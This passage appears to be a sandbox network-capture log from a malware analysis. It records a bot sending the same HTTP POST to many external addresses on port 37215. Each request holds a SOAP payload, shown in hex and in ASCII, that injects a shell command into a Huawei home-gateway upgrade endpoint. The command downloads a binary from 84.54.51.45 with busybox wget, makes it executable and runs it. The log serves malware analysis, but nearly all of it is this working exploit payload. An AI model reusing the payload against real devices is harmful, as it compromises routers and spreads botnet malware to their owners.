2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1193192.168.2.154897441.215.211.9937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175911903 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1194192.168.2.155108241.94.65.10437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175935030 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1195192.168.2.153956241.16.132.3137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175996065 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1196192.168.2.153968441.72.109.7937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175997019 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1197192.168.2.154431441.91.215.24737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.176068068 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1198192.168.2.155487441.119.74.8437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.176068068 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1199192.168.2.153993841.109.6.14437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.176069021 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1200192.168.2.155042441.201.102.18337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.176086903 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1201192.168.2.154732041.201.163.4537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.176115036 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1202192.168.2.155155041.34.53.18137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.176142931 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1203192.168.2.155178841.228.170.19337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.176176071 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
